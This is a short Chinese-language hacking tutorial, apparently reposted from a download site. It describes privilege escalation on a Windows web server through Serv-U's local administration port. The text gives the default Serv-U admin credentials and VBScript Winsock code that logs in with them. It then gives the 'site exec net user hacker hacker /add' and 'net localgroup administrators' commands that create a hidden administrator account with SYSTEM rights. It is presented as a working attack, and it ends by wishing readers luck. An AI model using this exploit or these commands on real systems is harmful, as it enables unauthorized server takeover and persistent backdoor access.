适用环境：服务器禁用FSO，关掉Wscript.shelll,没有执行权限。限制：没有更改管理员的密码，或者破解出了Serv-U的管理员的密码。Serv-U默认用户名：localadministrator   密码：#|@$ak#.|k;0@p      下面用MSWinsock。Winsock建立一个连接，并且以System权限添加超级用户，代码如下：以下是引用片段：Dim revdataDim sendataSet sock=createobject(“MSWinsock.Winsock”)Sock.protocol=0Sock.connect “127.0.0.1”,43958Sendata=”LocalAdministrator”& chr(10) &chr(13)Sock.senddata snedataSendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)Sock.senddata.sendata

使用这个代码就可以连上FTP了，接下来用Sock.senddata sendata 发送添加有执行权限用户的命令，想必大家该知道怎么做了吧，对了，就是用”site exec net user hacker hacker /add”     “site exec net localgroup administrators hacker /add”呵呵，就这样系统权限到手了，祝大家好运！


来源：https://www.jb51.net/hack/5286.html
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！